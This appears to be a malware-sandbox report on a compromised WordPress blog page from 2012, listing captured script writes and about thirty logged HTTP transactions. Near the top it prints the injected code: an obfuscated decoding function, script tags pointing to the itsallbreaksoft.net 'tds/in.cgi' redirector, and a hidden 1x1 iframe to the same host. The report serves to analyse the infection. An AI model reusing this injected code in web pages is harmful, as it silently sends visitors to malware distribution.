<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>

#5 JavaScript::Write (size: 224, repeated: 1)

<script src="http://itsallbreaksoft.net/tds/in.cgi?2&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&default_keyword=notdefine"></script>

#6 JavaScript::Write (size: 84, repeated: 1)

<script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script>

#7 JavaScript::Write (size: 652, repeated: 1)

<script>document.write("<script src=\""+"http://itsallbreaksoft.net/tds/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+ encodeURIComponent(document.URL)+"&default_keyword=notdefine"+"\"><\/script>");</script>
<script>
if(typeof(h)=="undefined"){	
	document.write("<iframe src='http://itsallbreaksoft.net/tds/in.cgi?3&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+ encodeURIComponent(document.URL)+"&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0></iframe>"); 
}
else if(h.indexOf("http:")==0){
		window.location=h;
}
</script>


HTTP Transactions (121)


Request Response
GET /wp-content/plugins/MyAvatars/style.css HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:24:01 GMT
Accept-Ranges: bytes
Content-Length: 125
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
GET /google-hot-trends-on-usa-election-day-2008/ HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Fri, 16 Nov 2012 20:24:40 GMT
Server: Apache
X-Pingback: http://www.meridiancrest.com/xmlrpc.php
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /wp-content/plugins/sociable/description_selection.js HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:24:06 GMT
Accept-Ranges: bytes
Content-Length: 582
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
GET /wp-content/plugins/dd-formmailer/dd-formmailer.css HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:23:13 GMT
Accept-Ranges: bytes
Content-Length: 4061
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
GET /wp-content/plugins/sociable/sociable.css HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:24:39 GMT
Accept-Ranges: bytes
Content-Length: 851
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
GET /wp-content/plugins/wp-contact-form/contactform.css HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:25:26 GMT
Accept-Ranges: bytes
Content-Length: 376
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
GET /wp-content/themes/meridian/style.css HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:54 GMT
Accept-Ranges: bytes
Content-Length: 17513
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
GET /wp-includes/js/jquery/jquery.js?ver=1.3.2 HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Fri, 13 Nov 2009 18:06:49 GMT
Accept-Ranges: bytes
Content-Length: 57276
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
GET /placeholder-3095765?target=_top&mouseover=N HTTP/1.1

Host: www.tkqlhce.com
GET /placeholder-3095765?target=_top&amp;mouseover=N HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: text/javascript
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.tkqlhce.com/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Fri, 16 Nov 2012 20:24:41 GMT
Cneonction: close
Transfer-Encoding: chunked
Date: Fri, 16 Nov 2012 20:24:41 GMT
GET /placeholder-3095822?target=_top&mouseover=N HTTP/1.1

Host: www.jdoqocy.com
GET /placeholder-3095822?target=_top&amp;mouseover=N HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: text/javascript
Server: Resin/3.1.8
P3P: policyref=&quot;http://www.jdoqocy.com/w3c/p3p.xml&quot;, CP=&quot;ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT&quot;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Fri, 16 Nov 2012 20:24:41 GMT
Cneonction: close
Transfer-Encoding: chunked
Date: Fri, 16 Nov 2012 20:24:41 GMT
GET /urchin.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 6847
Content-Encoding: gzip
Last-Modified: Wed, 07 Nov 2012 22:33:51 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Fri, 16 Nov 2012 11:57:54 GMT
Expires: Fri, 30 Nov 2012 11:57:54 GMT
Vary: Accept-Encoding
Cache-Control: max-age=1209600, public
Age: 30407
Server: GFE/2.0
GET /wp-content/plugins/wp-email/email-css.css HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:25:31 GMT
Accept-Ranges: bytes
Content-Length: 800
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive
GET /wp-includes/js/tw-sack.js?ver=1.6.1 HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Fri, 13 Nov 2009 18:06:49 GMT
Accept-Ranges: bytes
Content-Length: 3619
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
GET /wp-content/plugins/wp-email/email-js-packed.js?ver=2.30 HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:25:32 GMT
Accept-Ranges: bytes
Content-Length: 3548
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
GET /layout/banners/125x125.gif HTTP/1.1

Host: wprobot.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 10 May 2010 21:12:47 GMT
Etag: &quot;1860236-29a1-48643dee011c0&quot;
Accept-Ranges: bytes
Content-Length: 10657
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
GET /wp-content/themes/meridian/js/module.js HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:47 GMT
Accept-Ranges: bytes
Content-Length: 525
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/post-digg.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:27 GMT
Accept-Ranges: bytes
Content-Length: 631
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/post-print.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:28 GMT
Accept-Ranges: bytes
Content-Length: 777
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/post-save.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:28 GMT
Accept-Ranges: bytes
Content-Length: 881
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive
GET /wp-content/themes/meridian/js/jquery-1.2.1.pack.js HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:49 GMT
Accept-Ranges: bytes
Content-Length: 27147
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive
GET /wp-content/themes/meridian/js/ui.tabs.js HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:48 GMT
Accept-Ranges: bytes
Content-Length: 22348
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/post-email.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:27 GMT
Accept-Ranges: bytes
Content-Length: 996
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive
GET /images/buttons/blogcatalog5.gif HTTP/1.1

Host: www.blogcatalog.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 25 Feb 2011 17:51:24 GMT
Accept-Ranges: bytes
Content-Length: 235
X-UA-Compatible: IE=&quot;EmulateIE8&quot;
Cache-Control: max-age=604800, public
Keep-Alive: timeout=3, max=200
Connection: Keep-Alive
GET /pix/fave/tech-fav-1.png HTTP/1.1

Host: static.technorati.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Sun, 27 Jul 2008 02:17:34 GMT
Etag: &quot;4c6-27dab80&quot;
Accept-Ranges: bytes
Content-Length: 1222
Cache-Control: max-age=31536000
Expires: Sat, 16 Nov 2013 20:24:41 GMT
Connection: close
GET /wp-content/plugins/sociable/images/stumbleupon.png HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:24:35 GMT
Accept-Ranges: bytes
Content-Length: 998
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive
GET /wp-content/plugins/sociable/images/delicious.png HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:24:19 GMT
Accept-Ranges: bytes
Content-Length: 160
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive
GET /wp-content/plugins/sociable/images/reddit.png HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:24:30 GMT
Accept-Ranges: bytes
Content-Length: 772
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive
GET /wp-content/plugins/sociable/images/technorati.png HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:24:36 GMT
Accept-Ranges: bytes
Content-Length: 478
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive
GET /wp-content/plugins/sociable/images/fark.png HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:24:21 GMT
Accept-Ranges: bytes
Content-Length: 262
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive
GET /wp-content/plugins/sociable/images/feedmelinks.png HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 16 Nov 2012 20:24:41 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:24:22 GMT
Accept-Ranges: bytes
Content-Length: 582
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive
GET /wp-content/themes/first-spring-10/images/twitter.gif HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:27:36 GMT
Accept-Ranges: bytes
Content-Length: 3782
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/ubd-logo.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:42 GMT
Accept-Ranges: bytes
Content-Length: 3020
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive
GET /wp-content/themes/meridian/images/consulting-ad.jpg HTTP/1.1

Host: www.meridiancrest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.meridiancrest.com/google-hot-trends-on-usa-election-day-2008/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 16 Nov 2012 20:24:42 GMT
Server: Apache
Last-Modified: Mon, 29 Dec 2008 10:29:15 GMT
Accept-Ranges: bytes
Content-Length: 32151
Keep-Alive: timeout=5, max=70
Connection: Keep-Alive
GET /tds/in.cgi?2&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&default_keyword=notdefine HTTP/1.1

Host: itsallbreaksoft.net
GET /tds/in.cgi?2&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
